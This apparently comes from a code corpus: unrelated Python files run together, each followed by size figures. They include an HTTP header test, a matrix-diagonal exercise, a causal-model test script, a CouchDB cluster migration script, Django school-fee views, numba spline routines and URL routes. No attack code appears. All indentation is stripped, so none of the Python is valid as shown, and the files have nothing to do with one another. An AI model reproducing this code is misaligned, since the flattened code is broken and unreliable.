self.assertEqual(response.headers.get("Content-Disposition"), "inline")
# Headers
@pytest.mark.asyncio
async def test_response_header(self):
custom_header_key, custom_header_val = "Cutom-Header", "Value"
app = self.make_app_with_response(headers={custom_header_key: custom_header_val})
async with run(app) as client:
response = await client.get("/")
self.assertEqual(response.headers.get(custom_header_key), custom_header_val)
self.assertEqual(response.headers.get("Server"), server_version)
@pytest.mark.asyncio
async def test_response_headers(self):
custom_header1_key, custom_header1_val = "Cutom-Header", "Value1"
custom_header2_key, custom_header2_val = "Cutom-Header", "Value2"
app = self.make_app_with_response(headers=[
(custom_header1_key, custom_header1_val),
(custom_header2_key, custom_header2_val),
])
async with run(app) as client:
response = await client.get("/")
self.assertEqual(response.headers.getall(custom_header1_key),
[custom_header1_val, custom_header2_val])
self.assertEqual(response.headers.get("Server"), server_version)
@pytest.mark.asyncio
async def test_response_with_custom_server_header(self):
server_header = "server version x"
app = self.make_app_with_response(headers={"Server": server_header})
async with run(app) as client:
response = await client.get("/")
self.assertEqual(response.headers.get("Server"), server_header)
@pytest.mark.asyncio
async def test_response_with_expect_header(self):
app = self.make_app_with_response()
async with run(app) as client:
response = await client.post("/", json={}, expect100=True)
self.assertEqual(response.status, 200)
@pytest.mark.asyncio
async def test_response_with_incorrect_expect_header(self):
app = self.make_app_with_response()
async with run(app) as client:
response = await client.post("/", json={}, headers={"Expect": "banana"})
self.assertEqual(response.status, 417)
| 10,308 | 3,029 |
'''
Q04 - Faça um programa que leia uma matriz 3x3 de inteiros,
e apresente a Diagonal Principal desta Matriz.
'''
import random
# x = random.uniform(0, 10)
matriz = []
diagonalPrincipal = []
for i in range(0, 3, 1):
linha = []
for j in range(0, 3, 1):
# elemento = int(input("Digite o elemento da posição [%d]: " % (i)))
linha.append(random.randint(10, 60))
if (i == j):
diagonalPrincipal.append(linha[i])
matriz.append(linha)
print()
# print(matriz)
for i in range(0, 3, 1):
for j in range(0, 3, 1):
print(f"[{matriz[j][i]}]", end='')
print()
print()
for i in range(0, 3, 1):
for j in range(0, 3, 1):
print(f"[{matriz[i][j]}]", end='')
print()
print()
print(diagonalPrincipal)
| 766 | 318 |
from django.apps import AppConfig
class ServersConfig(AppConfig):
name = 'servers'
def ready(self):
import servers.signals
| 142 | 43 |
from frozendict import frozendict
from lib.halpern_pearl import Variable, CausalNetwork, CausalSetting, find_actual_causes, CausalFormula, PrimitiveEvent, \
Negation, find_trivial_explanations, EpistemicState, find_nontrivial_explanations, find_explanations, \
find_sufficient_causes
U_L, U_MD = Variable("U_L"), Variable("U_MD")
FF, L, MD = Variable("FF"), Variable("L"), Variable("MD")
exogenous_domains = {
U_L: {False, True},
U_MD: {False, True}
}
endogenous_domains = {
FF: {False, True},
L: {False, True},
MD: {False, True}
}
causal_network = CausalNetwork()
causal_network.add_dependency(FF, [L, MD], lambda parent_values: parent_values[L] or parent_values[MD])
causal_network.add_dependency(L, [U_L], lambda parent_values: parent_values[U_L])
causal_network.add_dependency(MD, [U_MD], lambda parent_values: parent_values[U_MD])
context = {U_L: True, U_MD: True}
causal_setting = CausalSetting(causal_network, context, exogenous_domains, endogenous_domains)
event = PrimitiveEvent(FF, True)
# list(find_actual_causes(event, causal_setting))
causal_network.write("forest_fire_disjunctive.png")
actual_causes = {frozendict(actual_cause) for actual_cause in find_actual_causes(event, causal_setting)}
expected_actual_causes = [{FF: True}, {L: True, MD: True}]
assert actual_causes == {frozendict(expected_actual_cause) for expected_actual_cause in expected_actual_causes}
sufficient_causes = {frozendict(sufficient_cause) for sufficient_cause in find_sufficient_causes(event, causal_setting)}
expected_sufficient_causes = [{FF: True}, {L: True}, {FF: True, L: True}, {MD: True}, {FF: True, MD: True}, {L: True, MD: True}, {FF: True, L: True, MD: True}]
assert sufficient_causes == {frozendict(expected_sufficient_cause) for expected_sufficient_cause in expected_sufficient_causes}
assert CausalFormula({MD: False}, event).entailed_by(causal_setting) # (Md, (1, 1)) |= [MD ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False}, event).entailed_by(causal_setting) # (Md, (1, 1)) |= [L ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False, MD: False}, Negation(event)).entailed_by(causal_setting) # (Md, (1, 1)) |= [L ← 0; MD ← 0](FF = 0) example from Page 21 [Halpern, 2016]
u0 = {U_L: False, U_MD: False}
u1 = {U_L: True, U_MD: False}
u2 = {U_L: False, U_MD: True}
u3 = {U_L: True, U_MD: True}
k1 = EpistemicState(causal_network, [u0, u1, u2, u3], exogenous_domains, endogenous_domains)
k2 = EpistemicState(causal_network, [u0, u1, u2], exogenous_domains, endogenous_domains)
k3 = EpistemicState(causal_network, [u0, u1, u3], exogenous_domains, endogenous_domains)
k4 = EpistemicState(causal_network, [u1, u3], exogenous_domains, endogenous_domains)
epistemic_states = [k1, k2, k3, k4]
explanations = [{frozendict(explanation) for explanation in find_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_explanations = [
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}]
]
assert explanations == [{frozendict(expected_explanation) for expected_explanation in epistemic_state} for epistemic_state in expected_explanations]
trivial_explanations = [{frozendict(trivial_explanation) for trivial_explanation in find_trivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_trivial_explanations = [
[{FF: True}],
[{FF: True}],
[{FF: True}, {L: True}],
[{FF: True}, {L: True}]
]
assert trivial_explanations == [{frozendict(expected_trivial_explanation) for expected_trivial_explanation in epistemic_state} for epistemic_state in expected_trivial_explanations]
nontrivial_explanations = [{frozendict(nontrivial_explanation) for nontrivial_explanation in find_nontrivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_nontrivial_explanations = [
[{L: True}, {MD: True}],
[{L: True}, {MD: True}],
[{MD: True}],
[{MD: True}]
]
assert nontrivial_explanations == [{frozendict(expected_nontrivial_explanation) for expected_nontrivial_explanation in epistemic_state} for epistemic_state in expected_nontrivial_explanations]
| 4,268 | 1,664 |
import getpass
import requests
import argparse
def main():
parser = argparse.ArgumentParser()
parser.add_argument('username')
parser.add_argument('-p', '--password')
args = parser.parse_args()
if not args.password:
args.password = getpass.getpass("Password")
auth = (args.username, args.password)
control_node = '100.71.184.25'
node_map = {
"10.247.164.74": '100.71.184.25',
"10.247.164.76": "100.71.184.8",
"10.247.164.75": "100.71.184.9",
"10.247.164.83": "100.71.184.6",
"": "100.71.184.17",
}
print('\nUPDATING MEMBERSHIP\n')
node_url = 'http://{}:15986/_nodes/couchdb@{{}}'.format(control_node)
for old_node, new_node in node_map.items():
if old_node:
res = requests.get(node_url.format(old_node), auth=auth)
if res.status_code == 200:
rev = res.json()['_rev']
url = node_url.format(old_node)
res = requests.delete('{}?rev={}'.format(url, rev), auth=auth)
print('DELETE node {}'.format(old_node), res.status_code)
res = requests.get(node_url.format(new_node), auth=auth)
if res.status_code != 200:
res = requests.put(node_url.format(new_node), data="{}", auth=auth)
print('ADD node {}'.format(new_node), res.status_code)
print('\nUPDATING DATABASE DOCS\n')
dbs = [
"commcarehq",
"commcarehq__apps",
"commcarehq__auditcare",
"commcarehq__domains",
"commcarehq__fixtures",
"commcarehq__fluff-bihar",
"commcarehq__m4change",
"commcarehq__meta",
"commcarehq__mvp-indicators",
"commcarehq__receiverwrapper",
"commcarehq__users",
]
dbs_url = 'http://{}:15986/_dbs/{{}}'.format(control_node)
for db in dbs:
res = requests.get(dbs_url.format(db), auth=auth)
db_doc = res.text
new_db_doc = db_doc
for old_node, new_node in node_map.items():
if old_node:
new_db_doc = new_db_doc.replace(old_node, new_node)
if db_doc != new_db_doc:
res = requests.put(dbs_url.format( db), data=new_db_doc, auth=auth)
print('UPDATE DB {}'.format(db), res.status_code)
print('\nRE-CREATING SYSTEM DATABASES\n')
system_dbs = [
"_global_changes",
"_replicator",
"_users"
]
for db in system_dbs:
res = requests.get('http://{}:15986/_dbs/{}'.format(control_node, db), auth=auth)
create = res.status_code == 404
if res.status_code == 200:
db_doc = res.json()
create = 'couchdb@10.247.164.12' in db_doc['by_node']
if create:
rev = db_doc['_rev']
res = requests.delete('http://{}:15986/_dbs/{}{}'.format(control_node, db, '?rev={}'.format(rev)), auth=auth)
print('DELETE db {}'.format(db), res.status_code)
if create:
res = requests.put('http://{}:15984/{}'.format(control_node, db), data="{}", auth=auth)
print("CREATE db {}".format(db), res.status_code)
if __name__ == '__main__':
main()
| 3,152 | 1,204 |
from django.shortcuts import render, redirect
from student.models import Admission
from .forms import SearchChallan
from django.utils import timezone
from django.db.models import Q
from .models import Voucher
from payroll.models import Salary
from django import forms
from django.contrib import messages
from django.urls import reverse_lazy
from django import forms
from django.db.models import Sum, Count
from django.http import HttpResponse, JsonResponse
import datetime
import json
from academic.models import Section, Classes
from num2words import num2words
# Create your views here.
from django.contrib.auth.mixins import PermissionRequiredMixin
from home.decorators import allowed_users
from django.contrib.auth.decorators import login_required
from payroll.models import Teacher
from home.views import SchoolProfile
from django.contrib.auth.models import User
# Fee section
class FeeDefSerchForm(forms.Form):
seacher_date = forms.CharField(
widget = forms.TextInput(
attrs = {
'class': 'date seacher_date',
'value': timezone.now().strftime('%Y-%m-%d')
}
)
)
class VoucherForm(forms.ModelForm):
class Meta:
model = Voucher
fields = '__all__'
def convert_month(month_val):
if len(str(month_val))<2:
return '0'+str(month_val)
else:
return month_val
def generate_voucher_number(number):
""" NEED AN INTEGER generate_voucher_number(number objects) """
sno = ''
number = int(number)+1
number = str(number)
if len(number)<2:
sno = '00000000'+number
elif len(number)<3:
sno = '0000000'+number
elif len(number)<4:
sno = '000000'+number
elif len(number)<5:
sno = '00000'+number
elif len(number)<6:
sno = '0000'+number
elif len(number)<7:
sno = '000'+number
elif len(number)<8:
sno = '00'+number
elif len(number)<9:
sno = '0'+number
else:
sno = number
return sno
@login_required
# @allowed_users('add_voucher')
def fee_main(request):
month = timezone.now().strftime("%m")
current_month = timezone.now().strftime("%Y-%m-%d")
year = timezone.now().strftime("%Y")
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
# GETTING MONTHLY FEE
current_month_total_fee = Voucher.objects.filter(
month=month,
fee_month=current_month,
year=year,
module_holder=module_holder
).aggregate(current_month_total_fee=Sum('monthly_tution_fee_paid'))
# GETTING YEALY FEE
current_year_total_fee = Voucher.objects.filter(
year=year,
module_holder=module_holder
).aggregate(current_year_total_fee=Sum('monthly_tution_fee_paid'))
# GETTING MONTHLY SALARY TOTAL
current_month_total_salary = Salary.objects.filter(
Q(Salary_date__startswith=timezone.now().strftime('%Y-%m'),
module_holder=module_holder)
).aggregate(monthly_salary=Sum('salary'))
# GETTING yearly SALARY TOTAL
current_year_total_salary = Salary.objects.filter(
Q(Salary_date__startswith=timezone.now().strftime('%Y'),
module_holder=module_holder)
).aggregate(yearly_salary=Sum('salary'))
print(current_month_total_salary,'====================================')
# # GETTING UNPAID VOUCHER MONTHLY
# current_unpaid_Vouchers_monthly = Voucher.objects.filter(
# month = month,
# year = year,
# monthly_tution_fee_paid=0,
# module_holder=module_holder
# ).count()
# # GETTING UNPAID VOUCHER YEARLY
# current_unpaid_Vouchers_yearly = Voucher.objects.filter(
# year = year,
# monthly_tution_fee_paid=0,
# module_holder=module_holder
# ).count()
data_chart= []
for month in range(1, 13):
paid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__gt=1).aggregate(paid = Sum('monthly_tution_fee_paid'))
unpaid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__lt=1).aggregate(unpaid = Sum('monthly_tution_fee') )
data_chart.append({
'paid': paid,
'unpaid': unpaid,
'date': year+'-'+str(convert_month(month))+'-'+'01'
})
final_chart=[]
for data in data_chart:
if data['paid']['paid'] is None:
paid = 0
else:
paid = data['paid']['paid']
if data['unpaid']['unpaid'] is None:
unpaid = 0
else:
unpaid = data['unpaid']['unpaid']
final_chart.append({
'paid_amount': paid,
'un_paid_amount': unpaid,
'date': data['date'],
})
print(final_chart)
ddddd = json.dumps(final_chart)
context = {
'data_chart': final_chart,
'ddddd': ddddd,
'current_year_total_salary':current_year_total_salary,
'current_month_total_salary': current_month_total_salary,
'current_month_total_fee': current_month_total_fee,
'current_year_total_fee': current_year_total_fee,
# 'current_unpaid_Vouchers_monthly': current_unpaid_Vouchers_monthly,
# 'current_unpaid_Vouchers_yearly': current_unpaid_Vouchers_yearly,
'current_month': timezone.now().strftime('%B, %Y'),
'current_month_redirect': timezone.now().strftime('%Y-%m-%d'),
'current_year': timezone.now().strftime('%Y'),
'current_month_total_fee': current_month_total_fee
}
return render(request,'fee/main.html', context)
@login_required
@allowed_users('view_voucher')
def fee_received(request, date):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
if len(date)>4:
searched_data_month = Voucher.objects.filter(module_holder=module_holder, month=date.split('-')[1], fee_month=date, year=date.split('-')[0], monthly_tution_fee_paid__gt=1)
else:
searched_data_month = Voucher.objects.filter(module_holder=module_holder, year=date, monthly_tution_fee_paid__gt=1)
context = {
'searched_data_month': searched_data_month
}
return render(request, 'fee/fee_received.html', context)
@login_required
# @allowed_users('view_voucher')
def GenerateChallan(request):
all_vouchers = []
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
if request.method=='POST':
search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
if search_form.is_valid():
class_id = request.POST.get('classes')
section_id = request.POST.get('admission_section')
# issue_date = request.POST.get('issue_date'),
# due_date = request.POST.get('due_date'),
# fee_month = request.POST.get('fee_month'),
year = request.POST.get('fee_month').split('-')[0],
year = year[0]
all_std = Admission.objects.filter(module_holder=module_holder, admission_class=class_id, admission_section=section_id)
# print('===================\n', request.POST)
for data in all_std:
search_voucher_data = Voucher.objects.filter(
student_name=Admission.objects.get(pk=data.pk),
father_name=data.father_name,
month=request.POST.get('fee_month').split('-')[1],
year=year,
module_holder=module_holder
)
if search_voucher_data.exists():
search_voucher_data.update(issue_date=request.POST.get('issue_date'),due_date=request.POST.get('due_date'))
messages.success(request, 'Data has been updated & ready to print')
else:
messages.success(request, 'Data has been Saved & ready to print')
if Voucher.objects.count()>0:
challan_number = Voucher.objects.values('id').latest('id')['id']
else:
challan_number ='0'
#COLCULATING FEE WITH ADMISSION DATE
monthly_tution_fee_divided_in_days = 0
admission_date = str(data.admission_date).split('-')
admission_year = int(admission_date[0])
admission_month = int(admission_date[1])
admission_day = int(admission_date[2])
challan_year = int(request.POST.get('fee_month').split('-')[0])
challan_month = int(request.POST.get('fee_month').split('-')[1])
if(admission_year==challan_year and admission_month==challan_month):
monthly_tut_fee = data.monthly_tution_fee
per_day_fee = monthly_tut_fee/30
days_of_fee = 30-admission_day
monthly_tution_fee_divided_in_days = per_day_fee*days_of_fee
else:
monthly_tution_fee_divided_in_days = data.monthly_tution_fee
if(admission_year<=challan_year and admission_month<=challan_month):
save_voucher = Voucher(
reg_number= data.admission_registration,
student_name=Admission.objects.get(pk=data.pk),
father_name=data.father_name,
issue_date=request.POST.get('issue_date'),
due_date=request.POST.get('due_date'),
fee_month=request.POST.get('fee_month'),
month= request.POST.get('fee_month').split('-')[1] ,
year=year,
challan_number=generate_voucher_number(challan_number),
monthly_tution_fee= monthly_tution_fee_divided_in_days,
section=data.admission_section,
class_name= data.admission_class,
module_holder = module_holder
).save()
all_vouchers_single = Voucher.objects.filter(
student_name=Admission.objects.get(pk=data.pk),
father_name=data.father_name,
month=request.POST.get('fee_month').split('-')[1],
year=year,
)
all_vouchers.append({'voucher':all_vouchers_single})
else:
search_form = SearchChallan(module_holder ,initial={'year':timezone.now().strftime('%Y')})
context = {
'search_form': search_form,
'all_student': all_vouchers,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request, 'fee/generate_challan.html', context)
@login_required
# @allowed_users('view_voucher')
def generated_challan(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
murge_data = []
if request.method=='POST':
print(request.POST)
index=0
for datas in request.POST.getlist('pk'):
data = {
'reg_number': request.POST.getlist('reg_number')[int(datas)],
'student_name':request.POST.getlist('name_of_student')[int(datas)],
'father_name':request.POST.getlist('father_name')[int(datas)],
'issue_date':request.POST.get('issue_date'),
'due_date':request.POST.get('due_date'),
'fee_month':request.POST.get('fee_month'),
'year':request.POST.get('year'),
'challan_number':request.POST.getlist('challan_number')[int(datas)],
'monthly_tution_fee': request.POST.getlist('monthly_tution_fee')[int(datas)],
'section': request.POST.getlist('admission_section')[int(datas)],
'class_name': request.POST.getlist('admission_class')[int(datas)],
'monthly_tution_fee_in_word': num2words(request.POST.getlist('monthly_tution_fee')[int(datas)])
}
for ps in range(0, 2):
copy = ''
if ps is 0:
copy="Parent's Copy"
else:
copy="School Copy"
murge_data.append({
'copy': copy,
'data': data
})
# if Voucher.objects.count()>0:
# challan_number = Voucher.objects.values('id').latest('id')['id']
# else:
# challan_number ='0'
# save_voucher = Voucher(
# reg_number= request.POST.getlist('reg_number')[index],
# student_name=Admission.objects.get(name_of_student=request.POST.getlist('name_of_student')[index]),
# father_name=request.POST.getlist('father_name')[index],
# issue_date=request.POST.get('issue_date'),
# due_date=request.POST.get('due_date'),
# fee_month=request.POST.get('fee_month'),
# month= request.POST.get('fee_month').split('-')[1] ,
# year=request.POST.get('year'),
# challan_number=generate_voucher_number(challan_number),
# monthly_tution_fee= request.POST.getlist('monthly_tution_fee')[index],
# section= Section.objects.get(section_name=request.POST.getlist('admission_section')[index]) ,
# class_name= Classes.objects.get(class_name=request.POST.getlist('admission_class')[index]) ,
# module_holder = 'masood'
# ).save()
# voucher_form = VoucherForm(request.POST)
# if voucher_form.is_valid():
# save_voucher.save()
index = index+1
user = User.objects.get(username=module_holder)
school_profile = SchoolProfile.objects.filter(username=user.pk).first()
# print('==================user profile', school_profile.school_logo.url)
context = {
'school_profile': school_profile,
'murge_data': murge_data,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request, 'fee/generated_challan.html', context)
@login_required
@allowed_users('view_voucher')
def UnpaidChallan(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
all_vouchers = []
if request.method=='POST':
search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
if search_form.is_valid():
# print(request.POST,'========form is valid')
search_voucher_data = Voucher.objects.filter(
class_name=Classes.objects.get(pk=request.POST.get('classes')),
section = Section.objects.get(pk=request.POST.get('admission_section')),
# issue_date = request.POST.get('issue_date'),
# due_date = request.POST.get('due_date'),
# fee_month = request.POST.get('fee_month'),
month=request.POST.get('fee_month').split('-')[1],
year=request.POST.get('year'),
module_holder = module_holder
)
status = 0
for data in search_voucher_data:
if data.monthly_tution_fee_paid>0:
status = data.monthly_tution_fee_paid
else:
status = 0
all_vouchers.append({
'pk':data.pk,
'challan_number':data.challan_number,
'reg_number':data.reg_number ,
'monthly_tution_fee':data.monthly_tution_fee ,
'status':status,
'student_name':data.student_name ,
'father_name':data.father_name,
'section':data.section ,
'class_name':data.class_name ,
})
if len(all_vouchers)>0:
print("not empty")
else:
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
else:
search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
context = {
'search_form': search_form,
'all_student': all_vouchers,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def payChallan(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
all_vouchers = []
if request.method=='POST':
search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
if search_form.is_valid():
# print(request.POST, 'this is valid=============')
for pk_index in request.POST.getlist('pk'):
pk = pk_index.split('-')[0]
index = pk_index.split('-')[1]
get_voucher_data = Voucher.objects.filter(pk=pk).update(
monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[int(index)]
)
search_voucher_data = Voucher.objects.filter(
class_name=request.POST.get('classes'),
section =request.POST.get('admission_section'),
# issue_date = request.POST.get('issue_date'),
# due_date = request.POST.get('due_date'),
month=request.POST.get('fee_month').split('-')[1],
year=request.POST.get('year'),
module_holder = module_holder
)
status = 0
for data in search_voucher_data:
if data.monthly_tution_fee_paid>0:
status = data.monthly_tution_fee_paid
else:
status = 0
all_vouchers.append({
'pk':data.pk,
'challan_number':data.challan_number,
'reg_number':data.reg_number ,
'monthly_tution_fee':data.monthly_tution_fee ,
'status':status,
'student_name':data.student_name ,
'father_name':data.father_name,
'section':data.section ,
'class_name':data.class_name
})
if len(all_vouchers)>0:
print("not empty")
else:
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate Challan ")
else:
search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
context = {
'search_form': search_form,
'all_student': all_vouchers,
'now': timezone.now().strftime('%m/%d/%Y')
}
return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def fee_defaulter(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
all_vouchers = []
date = timezone.now().strftime('%Y-%m-%d')
if request.method=='GET':
search_voucher_data = Voucher.objects.filter(
Q(monthly_tution_fee_paid__lt=1,
month=date.split('-')[1],
year=date.split('-')[0],
module_holder = module_holder)
)
if request.method=='POST':
Feedefserchform = FeeDefSerchForm(request.POST)
search_voucher_data = Voucher.objects.filter(
Q(monthly_tution_fee_paid__lt=1,
month=request.POST.get('seacher_date').split('-')[1],
year=request.POST.get('seacher_date').split('-')[0],
module_holder = module_holder)
)
if search_voucher_data:
print(search_voucher_data, 'this is valid=============')
index = 0
for pk_id in request.POST.getlist('pk'):
get_voucher_data = Voucher.objects.filter(pk=pk_id).update(
monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[index]
)
index = index+1
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
else:
messages.warning(request," There is no fee defaulter in this month ")
else:
Feedefserchform = FeeDefSerchForm()
status = 0
for data in search_voucher_data:
if data.monthly_tution_fee_paid>0:
status = data.monthly_tution_fee_paid
else:
status = 0
all_vouchers.append({
'pk':data.pk,
'challan_number':data.challan_number,
'reg_number':data.reg_number ,
'monthly_tution_fee':data.monthly_tution_fee ,
'status':status,
'student_name':data.student_name ,
'father_name':data.father_name,
'section':data.section ,
'class_name':data.class_name ,
})
if len(search_voucher_data)>0:
print("not empty")
else:
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
context = {
'all_student': all_vouchers,
'Feedefserchform': Feedefserchform,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request,'fee/fee_defaulter.html', context) | 23,816 | 7,649 |
from __future__ import division
import numpy as np
import time
from numba import jit, njit
# used by njitted routines (frozen)
basis = np.array([1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0, 0.0])
@njit(cache=True)
def solve_deriv_interp_1d(bands, coefs):
M = coefs.shape[0] - 2
# Solve interpolating equations
# First and last rows are different
bands[0, 1] /= bands[0, 0]
bands[0, 2] /= bands[0, 0]
bands[0, 3] /= bands[0, 0]
bands[0, 0] = 1.0
bands[1, 1] -= bands[1, 0] * bands[0, 1]
bands[1, 2] -= bands[1, 0] * bands[0, 2]
bands[1, 3] -= bands[1, 0] * bands[0, 3]
bands[0, 0] = 0.0
bands[1, 2] /= bands[1, 1]
bands[1, 3] /= bands[1, 1]
bands[1, 1] = 1.0
# Now do rows 2 through M+1
for row in range(2, M + 1):
bands[row, 1] -= bands[row, 0] * bands[row - 1, 2]
bands[row, 3] -= bands[row, 0] * bands[row - 1, 3]
bands[row, 2] /= bands[row, 1]
bands[row, 3] /= bands[row, 1]
bands[row, 0] = 0.0
bands[row, 1] = 1.0
# Do last row
bands[M + 1, 1] -= bands[M + 1, 0] * bands[M - 1, 2]
bands[M + 1, 3] -= bands[M + 1, 0] * bands[M - 1, 3]
bands[M + 1, 2] -= bands[M + 1, 1] * bands[M, 2]
bands[M + 1, 3] -= bands[M + 1, 1] * bands[M, 3]
bands[M + 1, 3] /= bands[M + 1, 2]
bands[M + 1, 2] = 1.0
coefs[M + 1] = bands[(M + 1), 3]
# Now back substitute up
for row in range(M, 0, -1):
coefs[row] = bands[row, 3] - bands[row, 2] * coefs[row + 1]
# Finish with first row
coefs[0] = bands[0, 3] - bands[0, 1] * coefs[1] - bands[0, 2] * coefs[2]
@njit(cache=True)
def find_coefs_1d(delta_inv, M, data, coefs):
bands = np.zeros((M + 2, 4))
# Setup boundary conditions
abcd_left = np.zeros(4)
abcd_right = np.zeros(4)
# Left boundary
abcd_left[0] = 1.0 * delta_inv * delta_inv
abcd_left[1] = -2.0 * delta_inv * delta_inv
abcd_left[2] = 1.0 * delta_inv * delta_inv
abcd_left[3] = 0
# Right boundary
abcd_right[0] = 1.0 * delta_inv * delta_inv
abcd_right[1] = -2.0 * delta_inv * delta_inv
abcd_right[2] = 1.0 * delta_inv * delta_inv
abcd_right[3] = 0
for i in range(4):
bands[0, i] = abcd_left[i]
bands[M + 1, i] = abcd_right[i]
for i in range(M):
for j in range(3):
bands[i + 1, j] = basis[j]
bands[i + 1, 3] = data[i]
solve_deriv_interp_1d(bands, coefs)
@njit(cache=True)
def filter_coeffs_1d(dinv, data):
M = data.shape[0]
N = M + 2
coefs = np.zeros(N)
find_coefs_1d(dinv[0], M, data, coefs)
return coefs
@njit(cache=True)
def filter_coeffs_2d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Nx = Mx + 2
Ny = My + 2
coefs = np.zeros((Nx, Ny))
# First, solve in the X-direction
for iy in range(My):
# print(data[:,iy].size)
# print(spline.coefs[:,iy].size)
find_coefs_1d(dinv[0], Mx, data[:, iy], coefs[:, iy])
# Now, solve in the Y-direction
for ix in range(Nx):
find_coefs_1d(dinv[1], My, coefs[ix,:], coefs[ix,:])
return coefs
@njit(cache=True)
def filter_coeffs_3d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Mz = data.shape[2]
Nx = Mx + 2
Ny = My + 2
Nz = Mz + 2
coefs = np.zeros((Nx, Ny, Nz))
for iy in range(My):
for iz in range(Mz):
find_coefs_1d(dinv[0], Mx, data[:, iy, iz], coefs[:, iy, iz])
# Now, solve in the Y-direction
for ix in range(Nx):
for iz in range(Mz):
find_coefs_1d(dinv[1], My, coefs[ix,:, iz], coefs[ix,:, iz])
# Now, solve in the Z-direction
for ix in range(Nx):
for iy in range(Ny):
find_coefs_1d(dinv[2], Mz, coefs[ix, iy,:], coefs[ix, iy,:])
return coefs
@njit(cache=True)
def filter_coeffs_4d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Mz = data.shape[2]
Mz4 = data.shape[3]
Nx = Mx + 2
Ny = My + 2
Nz = Mz + 2
Nz4 = Mz4 +2
coefs = np.zeros((Nx, Ny, Nz, Nz4))
# First, solve in the X-direction
for iy in range(My):
for iz in range(Mz):
for iz4 in range(Mz4):
find_coefs_1d(dinv[0], Mx, data[:, iy, iz, iz4], coefs[:, iy, iz, iz4])
# Now, solve in the Y-direction
for ix in range(Nx):
for iz in range(Mz):
for iz4 in range(Mz4):
find_coefs_1d(dinv[1], My, coefs[ix, :, iz, iz4], coefs[ix, :, iz, iz4])
# Now, solve in the Z-direction
for ix in range(Nx):
for iy in range(Ny):
for iz4 in range(Mz4):
find_coefs_1d(dinv[2], Mz, coefs[ix, iy, :, iz4], coefs[ix, iy, :, iz4])
# Now, solve in the Z4-direction
for ix in range(Nx):
for iy in range(Ny):
for iz in range(Nz):
find_coefs_1d(dinv[3], Mz4, coefs[ix, iy, iz, :], coefs[ix, iy, iz, :])
return coefs
def filter_coeffs(smin, smax, orders, data):
smin = np.array(smin, dtype=float)
smax = np.array(smax, dtype=float)
dinv = (smax - smin) / orders
data = data.reshape(orders)
return filter_data(dinv, data)
def filter_mcoeffs(smin, smax, orders, data):
order = len(smin)
n_splines = data.shape[-1]
coefs = np.zeros(tuple([i + 2 for i in orders])+(n_splines,) )
for i in range(n_splines):
coefs[...,i] = filter_coeffs(smin, smax, orders, data[..., i])
return coefs
def filter_data(dinv, data):
if len(dinv) == 1:
return filter_coeffs_1d(dinv, data)
elif len(dinv) == 2:
return filter_coeffs_2d(dinv, data)
elif len(dinv) == 3:
return filter_coeffs_3d(dinv, data)
elif len(dinv) == 4:
return filter_coeffs_4d(dinv, data)
#
if __name__ == "__main__":
import numpy
dinv = numpy.ones(3, dtype=float)*0.5
coeffs_0 = numpy.random.random([10,10,10])
coeffs_1 = numpy.random.random([100,100,100])
print(coeffs_0[:2,:2,:2])
import time
t1 = time.time()
filter_coeffs_3d(dinv, coeffs_0)
t2 = time.time()
filter_coeffs_3d(dinv, coeffs_1)
t3 = time.time()
print('Elapsed : {}'.format(t2-t1))
print('Elapsed : {}'.format(t3-t2))
| 6,211 | 2,899 |
from django.urls import path
from . import views
urlpatterns = [
path('product/', views.apiOverview, name='overview'),
path('product/list/', views.productList, name='product-list'),
path('product/detail/<str:pk>', views.productDetail, name='product-detail'),
